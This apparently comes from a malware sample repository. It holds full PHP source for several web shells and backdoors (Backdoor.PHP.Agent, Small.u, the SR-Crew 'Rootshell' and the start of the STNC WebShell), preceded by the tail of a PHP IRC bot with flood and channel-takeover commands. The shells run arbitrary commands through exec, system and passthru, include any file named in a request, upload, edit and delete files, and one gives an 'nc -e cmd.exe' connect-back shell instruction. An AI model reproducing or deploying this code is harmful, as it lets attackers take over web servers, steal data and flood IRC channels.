fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
}
elseif ($com[3]==':`slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Tepat Di jidat 4pake kursi, kompor, penggorengan, plus tahi kuda... 2JeGuuuERRR... PleeTHaaQQQ ... DeeZZiiNGhHH ... 12cukuliinn dach loe ... monyong² tuh jidat ... hahahahakZ :4P~'. CRL);
}
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PONG! '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', PING! '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":tsunami");
$msg = str_replace(":tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :TSUNAMI '.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :FLOOD '.$msg.'' . CRL);
if (ereg("#", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
$raway="on";
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
$raway="off";
fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
elseif ($com[3]==':`nickmode' && $com[4]) {
$nickmode = $com[4];
fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL);
}
elseif ($com[3]==':`chanlist') {
fputs($fp, 'NOTICE '.$dNick.' :Channel List: '.$channels . CRL);
}
elseif ($com[3]==':`userlist') {
$userlist="";
foreach ($auth as $user) {
if ($user["pass"]) { $pass="-pass ok"; }
else { $pass="-no pass"; }
$userlist .= $user["name"].'('.$user["status"].$pass.') ';
}
fputs($fp, 'NOTICE '.$dNick.' :User List: '.$userlist . CRL);
}
elseif ($com[3]==':`quit' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`quit");
$msg = str_replace(":`quit","",$msg);
if (strlen($msg)>3) {
$msg = str_replace(" ","_",$msg);
}
$quit1 = array("ngantor","nguantuk","sama","brb","bye_all","s33_you","excess_flood","pingtimeout","hehe","bye","mandi","makan","muuah","quit","conection_reset_bay_peer","banned","part","leaving","ada_deh","call_me","wew","toronto.hub.dal.net_brodway.dal.net","no_komen","restart");
$quitmsg = $quit1[rand(0,count($quit1) - 1)];
fputs($fp, 'QUIT ' . $quitmsg . CRL);
$keluar = 1;
exit;
}
elseif ($com[3]==':`vhost' && $auth["$dNick"]["status"]=="Admin") {
if ($com[4]) { $localhost = $com[4]; }
else { $localhost = 'localhost'; }
$keluar = 0;
fputs($fp, 'QUIT ' . CRL);
}
elseif ($com[3]==':`jump' && $auth["$dNick"]["status"]=="Admin") {
if (!eregi(".dal.net",$com[4])) {
$remotehost = "irc.dal.net";
} else { $remotehost = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT changging_server' . CRL);
}
elseif ($com[3]==':`ident' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$username = $username;
} else { $username = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_ident' . CRL);
}
elseif ($com[3]==':`fullname' && $auth["$dNick"]["status"]=="Admin") {
if (!$com[4]) {
$realname = "--";
} else { $realname = $com[4]; }
$keluar = 0;
fputs($fp, 'QUIT ganti_fullname' . CRL);
}
elseif ($com[3]==':`topic' && $com[4] && $chan) {
$msg = strstr($data,":`topic");
$msg = str_replace(":`topic ","",$msg);
fputs($fp, 'TOPIC '.$chan.' :'.$msg . CRL);
}
elseif ($com[3]==':!help' && !$chan) {
fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
}
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
}
}
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
if (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '. $Admin .' :4inviter: ' . $dFrom . '2:' .$iText. CRL);
}
$inv = strstr($dFrom,'@');
foreach ($auth as $user) {
if ($user["status"]=="user") {
fputs($fp, 'NOTICE '.$user["name"].' :KB '.$chan.' '.$dNick.' '.$inv.'' . CRL);
}
}
}
}
elseif (!ereg("#",$dCommand)) {
if ($log=="on") {
fputs($fp,'PRIVMSG '.$Admin.' :6' . $dFrom . '12:' .$iText. CRL);
}
}
}
}
}
elseif (substr($data,0,4) == 'PING') {
fputs($fp,'PONG ' . substr($data,5) . CRL);
$smile = $querym[rand(0,count($querym) - 1)];
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
}
}
}
fclose ($fp);
} while ($keluar==0);
}
working($nick);
?>

37
PHP/Backdoor.PHP.Agent.fo Normal file
View File

@ -0,0 +1,37 @@
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

349
PHP/Backdoor.PHP.Agent.m Normal file
View File

@ -0,0 +1,349 @@
<!--
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/* ................jdWMMMMMNk&,...JjdMMMHMMHA+................ */
/* .^.^.^.^.^.^..JdMMMBC:vHMMNI..`dMMM8C`ZMMMNs...^^.^^.^^.^^. */
/* ..^.^..^.....dMMMBC`....dHNn...dMNI....`vMMMNy.........^... */
/* .....^..?XMMMMMBC!..dMM@MMMMMMM#MMH@MNZ,^!OMMHMMNk!..^...^. */
/* ^^.^..^.`??????!`JdN0??!??1OUUVT??????XQy!`??????!`..^..^.^ */
/* ..^..^.....^..^..?WN0`` ` +llz:` .dHR:..^.......^..^... */
/* ...^..^.^.^..^...`?UXQQQQQeyltOOagQQQeZVz`..^.^^..^..^..^.. */
/* ^.^..^..^..^..^.^..`zWMMMMH0llOXHMMMM9C`..^.....^..^..^..^. */
/* ..^..^...^..+....^...`zHHWAwtltwAXH8I....^...?+....^...^..^ */
/* ...^..^...JdMk&...^.^..^zHNkAAwWMHc...^.....jWNk+....^..^.. */
/* ^.^..^..JdMMMMNHo....^..jHMMMMMMMHl.^..^..jWMMMMNk+...^..^. */
/* .^....jdNMM9+4MMNmo...?+zZV7???1wZO+.^..ddMMM6?WMMNmc..^..^ */
/* ^.^.jqNMM9C!^??UMMNmmmkOltOz+++zltlOzjQQNMMY?!`??WMNNmc^.^. */
/* ummQHMM9C!.uQo.??WMMMMNNQQkI!!?wqQQQQHMMMYC!.umx.?7WMNHmmmo */
/* OUUUUU6:.jgWNNmx,`OUWHHHHHSI..?wWHHHHHW9C!.udMNHAx.?XUUUU9C */
/* .......+dWMMMMMNm+,`+ltltlzz??+1lltltv+^.jdMMMMMMHA+......^ */
/* ..^..JdMMMMC`vMMMNkJuAAAAAy+...+uAAAAA&JdMMMBC`dMMMHs....^. */
/* ....dMMMMC``.``zHMMMMMMMMMMS==zXMMMMMMMMMM8v``.`?ZMMMNs.... */
/* dMMMMMBC!`.....`!?????1OVVCz^^`+OVVC??????!`....^`?vMMMMMNk */
/* ??????!`....^.........?ztlOz+++zlltz!........^.....???????! */
/* .....^.^^.^..^.^^...uQQHkwz+!!!+zwWHmmo...^.^.^^.^..^....^. */
/* ^^.^.....^.^..^...ugHMMMNkz1++++zXMMMMHmx..^....^.^..^.^..^ */
/* ..^.^.^.....^...jdHMMMMM9C???????wWMMMMMHn+...^....^..^..^. */
/* ^....^.^.^....JdMMMMMMHIz+.......?zdHMMMMMNA....^..^...^..^ */
/* .^.^....^...JdMMMMMMHZttOz1111111zlttwWMMMMMNn..^.^..^..^.. */
/* ..^.^.^....dNMMMMMWOOtllz!^^^^^^^+1lttOZWMMMMMNA,....^..^.. */
/* ^....^..?dNMMMMMC?1ltllllzzzzzzzzzlllltlz?XMMMMNNk+^..^..^. */
/* .^.^..+dNMM8T77?!`+lllz!!!!!!!!!!!!+1tll+`??777HMNHm;..^..^ */
/* ..^..^jHMMNS`..^.`+ltlz+++++++++++++ztll+`....`dMMMHl.^..^. */
/* ....^.jHMMNS`^...`+ltlz+++++++++++++zltl+`^.^.`dMMMHl..^..^ */
/* ^^.^..jHMMNS`.^.^`+tllz+...........?+ltl+`.^..`dMMMHl...^.. */
/* ..^..^jHMMM6`..^.`+lltltltlz111zltlltlll+`...^`dMMMHl.^..^. */
/* ....^.jHNC``.^...`+zltlltlz+^^.+zltlltzz+`..^.^`?dMHl..^..^ */
/* .^.^..jHNI....^..^``+zltltlzzzzzltltlv!``.^...^..dMHc....^. */
/* ^...jdNMMNmo...^...^`?+ztlltllltlltz!``..^.^...dqNMMNmc.^.. */
/* .^.`?7TTTTC!`..^.....^`?!!!!!!!!!!!!`..^....^.`?7TTTTC!..^. */
/* ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
/*
/* We should take care some kind of history, i will add here to keep a trace of changes (who made it).
/* Also I think we should increase the last version number by 1 if you make some changes.
/*
/* CHANGES / VERSION HISTORY:
/* ====================================================================================
/* Version Nick Description
/* - - - - - - - - - - - - - - - - - - - - - - - - - - -
/* 0.3.1 666 added an ascii bug :)
/* 0.3.1 666 password protection
/* 0.3.1 666 GET and POST changes
/* 0.3.2 666 coded a new uploader
/* 0.3.2 666 new password protection
/* 0.3.3 666 added a lot of comments :)
/* 0.3.3 666 added "Server Info"
/* 1.0.0 666 added "File Inclusion"
/* 1.0.0 666 removed password protection (nobody needs it...)
/* 1.0.0 666 added "Files & Directories"
/* 1.3.3 666 added "File Editor"
/* 2.0.0 666 added "Notices"
/* 2.0.0 666 added some new modules
/* 2.0.0 666 made some design updates
/*
/*
-->
<?
//
// Default Changes
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
$owner = "SR-Crew"; // Insert your nick
$version = "2.0.0"; // The version
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
//
?>
<body link="#000000" vlink="#000000" alink="#000000" bgcolor="#FFFFD5">
<style type="text/css">
body{
cursor:crosshair
}
</style>
<div align="center" style="width: 100%; height: 100">
<pre width="100%" align="center"><strong> ____ _ ____ _ _ _
| _ \ ___ ___ | |_ / ___|| |__ ___| | |
| |_) / _ \ / _ \| __| \___ \| '_ \ / _ \ | |
| _ < (_) | (_) | |_ _ ___) | | | | __/ | |
|_| \_\___/ \___/ \__| (_) |____/|_| |_|\___|_|_|</pre>
</div></strong>
<b><u><center><font face='Verdana' style='font-size: 8pt'><?php echo "This server has been infected by $owner"; ?></font></center></u></b>
<hr color="#000000" size="2,5">
<div align="center">
<center>
<p>
<?php
// Check for safe mode
if( ini_get('safe_mode') ) {
print '<font face="Verdana" color="#FF0000" style="font-size:10pt"><b>Safe Mode ON</b></font>';
} else {
print '<font face="Verdana" color="#008000" style="font-size:10pt"><b>Safe Mode OFF</b></font>';
}
?>
&nbsp;</p><font face="Webdings" size="6">!</font><br>
&nbsp;<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="25" bordercolor="#000000">
<tr>
<td width="1%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Server Info ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center">
<font face="Verdana" style="font-size: 8pt"><b>Current Directory:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
<br />
<b>Shell:</b> <? echo $SCRIPT_FILENAME ?>
<br>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?><br>
<b>Server Name:</b> <? echo $SERVER_NAME ?><br>
<b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?><br>
</font></tr>
</table><br />
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="100%" id="AutoNumber1" height="426" bordercolor="#000000">
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ Command Execute ]</font></td>
<td width="51%" height="26" bgcolor="#FCFEBA" valign="middle">
<p align="center"><font face="Verdana" size="2">[ File Upload ]</font></td>
</tr>
<tr>
<td width="49%" height="142">
<p align="center"><form method="post">
<p align="center">
<br>
<font face="Verdana" style="font-size: 8pt">Insert your commands here:</font><br>
<br>
<textarea size="70" name="command" rows="2" cols="40" ></textarea> <br>
<br><input type="submit" value="Execute!"><br>
&nbsp;<br></p>
</form>
<p align="center">
<textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea><br>
<br>
<font face="Verdana" style="font-size: 8pt"><b>Info:</b> For a connect
back Shell, use: <i>nc -e cmd.exe [SERVER] 3333<br>
</i>after local command: <i>nc -v -l -p 3333 </i>(Windows)</font><br /><br /> <td><p align="center"><br>
<form enctype="multipart/form-data" method="post">
<p align="center"><br>
<br>
<font face="Verdana" style="font-size: 8pt">Here you can upload some files.</font><br>
<br>
<input type="file" name="file" size="20"><br>
<br>
<font style="font-size: 5pt">&nbsp;</font><br>
<input type="submit" value="Upload File!"> <br>
&nbsp;</p>
</form>
<?php
function check_file()
{
global $file_name, $filename;
$backupstring = "copy_of_";
$filename = $backupstring."$filename";
if( file_exists($filename))
{
check_file();
}
}
if(!empty($file))
{
$filename = $file_name;
if( file_exists($file_name))
{
check_file();
echo "<p align=center>File already exist</p>";
}
else
{
copy($file,"$filename");
if( file_exists($filename))
{
echo "<p align=center>File uploaded successful</p>";
}
elseif(! file_exists($filename))
{
echo "<p align=center>File not found</p>";
}
}
}
?>
<font face="Verdana" style="font-size: 8pt">
<p align=\"center\"></font>
</td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Files & Directories ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Inclusion ]</font></td>
</tr>
<tr>
<td style="overflow:auto" width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center">
<br>
<div align="center" style="overflow:auto; width:99%; height:175">
<?
$folder=opendir('./');
while ($file = readdir($folder)) {
if($file != "." && $file != "..")
echo '<a target="blank" href='.$file.'>'.$file.'</a><br>';
}
closedir($folder);
?>
</div><p align="center">&nbsp;</td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
Include
something :)<br>
<br>
&nbsp;</font><form method="POST">
<p align="center">
<input type="text" name="incl" size="20"><br>
<br>
<input type="submit" value="Include!" name="inc"></p>
</form>
<?php @$output = include($_POST['incl']); ?>
</td>
</tr>
<tr>
<td width="49%" height="25" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ File Editor ]</font></td>
<td width="51%" height="19" bgcolor="#FCFEBA">
<p align="center"><font face="Verdana" size="2">[ Notices ]</font></td>
</tr>
<tr>
<td width="49%" height="231">
<font face="Verdana" style="font-size: 11pt">
<p align="center"><?
$scriptname = $_SERVER['SCRIPT_NAME'];
$filename = $_POST["filename"];
if($_POST["submit"] == "Open")
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));
if(!$filecontents)
$status = "<font face='Verdana' style='font-size: 8pt'>Error or No contents in file</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Delete")
{
if(file_exists($filename))
{
if(unlink($filename))
$status = "<font face='Verdana' style='font-size: 8pt'>File successfully deleted!</font>";
else
$status = "<font face='Verdana' style='font-size: 8pt'>Could not delete file!</font>";
}
else
$status = "<font face='Verdana' style='font-size: 8pt'>File does not exist!</font>";
}
else if($_POST["submit"] == "Save")
{
$filecontents = stripslashes(html_entity_decode($_POST["contents"]));
if(file_exists($filename))
unlink($filename);
$handle = fopen($filename, "w");
if(!$handle)
$status = "<font face='Verdana' style='font-size: 8pt'>Could not open file for write access! </font>";
else
{
if(!fwrite($handle, $filecontents))
$status = $status."<font face='Verdana' style='font-size: 8pt'>Could not write to file! (Maybe you didn't enter any text?)</font>";
fclose($handle);
}
$filecontents = htmlentities($filecontents);
}
else
{
$status = "<font face='Verdana' style='font-size: 8pt'>No file loaded!</font>";
}
?>
<table border="0" align="center">
<tr>
<td>
<table width="100%" border="0">
<tr>
<td>
<form method="post" action="<?echo $scriptname;?>">
<input name="filename" type="text" value="<?echo $filename;?>" size="20">
<input type="submit" name="submit" value="Open">
<input type="submit" name="submit" value="Delete">
</td>
</tr>
</table>
</td>
</tr>
<tr>
<td>
<font face="Verdana" style="font-size: 11pt">
<textarea name="contents" cols="53" rows="8"><?echo $filecontents;?></textarea></font><br>
<input type="submit" name="submit" value="Save">
<input type="reset" value="Reset">
</form>
</td>
</tr>
<tr>
<td>
<h2><?echo $status;?></h2>
</td>
</tr>
</table> </td>
<td width="51%" height="232">
<p align="center"><font face="Verdana" style="font-size: 8pt"><br>
<textarea rows="13" cols="55"></textarea><br>
&nbsp;</font><?php @$output = include($_POST['incl']); ?></td>
</tr>
</table>
</center>
</div>
<br /></p>
<div align="center">
<center>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2">
<tr>
<td width="100%" bgcolor="#FCFEBA" height="20">
<p align="center"><font face="Verdana" size="2">Rootshell v<?php echo "$version" ?> © 2006 by <a style="text-decoration: none" target="_blank" href="http://www.SR-Crew.de.tt">SR-Crew</a> </font></td>
</tr>
</table>
</center>
</div>

36
PHP/Backdoor.PHP.Small.u Normal file
View File

@ -0,0 +1,36 @@
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;

168
PHP/Backdoor.PHP.Stnc.a Normal file
View File

@ -0,0 +1,168 @@
<?php
$version = "0.8";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
error_reporting(0);
if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }
/*
$login='root';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic");
die();
}
*/
function fe($s)
{return function_exists($s);}
function cmd($s)
{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
elseif(fe("shell_exec"))$r=shell_exec($s);
elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
else $r=`$s`;return $r;}
function safe_mode_is_on()
{return ini_get('safe_mode');}
function str100($s)
{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
function id()
{return str100(cmd("id"));}
function uname()
{return str100(cmd("uname -a"));}
function edit($size, $name, $val)
{ return "<input type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}
$action_edit = false;
$printline = "";
if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";
if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
$location = getcwd();
if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
.btn {background-color: #cfcfcf;} .pad {padding:5;}
</style><title> STNC WebShell v$version </title></head><body><table width=100%>
